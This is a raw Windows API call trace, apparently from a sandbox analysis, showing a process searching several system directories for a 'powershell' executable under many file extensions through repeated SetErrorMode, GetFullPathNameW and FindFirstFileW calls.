	[0341.781] SetErrorMode (uMode=0x1) returned 0x1
	[0341.781] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0341.781] SetErrorMode (uMode=0x1) returned 0x1
	[0341.781] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.781] SetErrorMode (uMode=0x1) returned 0x1
	[0341.781] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0341.782] SetErrorMode (uMode=0x1) returned 0x1
	[0341.782] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.782] SetErrorMode (uMode=0x1) returned 0x1
	[0341.782] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0341.782] SetErrorMode (uMode=0x1) returned 0x1
	[0341.782] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.782] SetErrorMode (uMode=0x1) returned 0x1
	[0341.782] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0341.783] SetErrorMode (uMode=0x1) returned 0x1
	[0341.783] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.783] SetErrorMode (uMode=0x1) returned 0x1
	[0341.783] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0341.783] SetErrorMode (uMode=0x1) returned 0x1
	[0341.783] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.783] SetErrorMode (uMode=0x1) returned 0x1
	[0341.784] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0341.784] SetErrorMode (uMode=0x1) returned 0x1
	[0341.784] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.784] SetErrorMode (uMode=0x1) returned 0x1
	[0341.784] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0341.784] SetErrorMode (uMode=0x1) returned 0x1
	[0341.785] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.785] SetErrorMode (uMode=0x1) returned 0x1
	[0341.785] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0341.785] SetErrorMode (uMode=0x1) returned 0x1
	[0341.785] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.786] SetErrorMode (uMode=0x1) returned 0x1
	[0341.786] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0341.786] SetErrorMode (uMode=0x1) returned 0x1
	[0341.786] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.786] SetErrorMode (uMode=0x1) returned 0x1
	[0341.786] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0341.786] SetErrorMode (uMode=0x1) returned 0x1
	[0341.787] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.787] SetErrorMode (uMode=0x1) returned 0x1
	[0341.787] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0341.787] SetErrorMode (uMode=0x1) returned 0x1
	[0341.787] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.787] SetErrorMode (uMode=0x1) returned 0x1
	[0341.787] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0341.788] SetErrorMode (uMode=0x1) returned 0x1
	[0341.788] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.788] SetErrorMode (uMode=0x1) returned 0x1
	[0341.788] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0341.788] SetErrorMode (uMode=0x1) returned 0x1
	[0341.788] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.788] SetErrorMode (uMode=0x1) returned 0x1
	[0341.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0341.789] SetErrorMode (uMode=0x1) returned 0x1
	[0341.789] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.789] SetErrorMode (uMode=0x1) returned 0x1
	[0341.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0341.789] SetErrorMode (uMode=0x1) returned 0x1
	[0341.789] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.789] SetErrorMode (uMode=0x1) returned 0x1
	[0341.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0341.790] SetErrorMode (uMode=0x1) returned 0x1
	[0341.790] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.790] SetErrorMode (uMode=0x1) returned 0x1
	[0341.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0341.790] SetErrorMode (uMode=0x1) returned 0x1
	[0341.790] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.791] SetErrorMode (uMode=0x1) returned 0x1
	[0341.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0341.791] SetErrorMode (uMode=0x1) returned 0x1
	[0341.791] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.791] SetErrorMode (uMode=0x1) returned 0x1
	[0341.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0341.791] SetErrorMode (uMode=0x1) returned 0x1
	[0341.791] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.792] SetErrorMode (uMode=0x1) returned 0x1
	[0341.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0341.792] SetErrorMode (uMode=0x1) returned 0x1
	[0341.792] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.792] SetErrorMode (uMode=0x1) returned 0x1
	[0341.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0341.792] SetErrorMode (uMode=0x1) returned 0x1
	[0341.792] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.793] SetErrorMode (uMode=0x1) returned 0x1
	[0341.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0341.793] SetErrorMode (uMode=0x1) returned 0x1
	[0341.793] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.794] SetErrorMode (uMode=0x1) returned 0x1
	[0341.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0341.794] SetErrorMode (uMode=0x1) returned 0x1
	[0341.794] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.794] SetErrorMode (uMode=0x1) returned 0x1
	[0341.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0341.795] SetErrorMode (uMode=0x1) returned 0x1
	[0341.795] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.795] SetErrorMode (uMode=0x1) returned 0x1
	[0341.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0341.795] SetErrorMode (uMode=0x1) returned 0x1
	[0341.795] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.795] SetErrorMode (uMode=0x1) returned 0x1
	[0341.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0341.796] SetErrorMode (uMode=0x1) returned 0x1
	[0341.796] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.796] SetErrorMode (uMode=0x1) returned 0x1
	[0341.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0341.796] SetErrorMode (uMode=0x1) returned 0x1
	[0341.796] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.797] SetErrorMode (uMode=0x1) returned 0x1
	[0341.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0341.797] SetErrorMode (uMode=0x1) returned 0x1
	[0341.797] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.797] SetErrorMode (uMode=0x1) returned 0x1
	[0341.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0341.798] SetErrorMode (uMode=0x1) returned 0x1
	[0341.798] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.798] SetErrorMode (uMode=0x1) returned 0x1
	[0341.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0341.798] SetErrorMode (uMode=0x1) returned 0x1
	[0341.798] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.799] SetErrorMode (uMode=0x1) returned 0x1
	[0341.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0341.799] SetErrorMode (uMode=0x1) returned 0x1
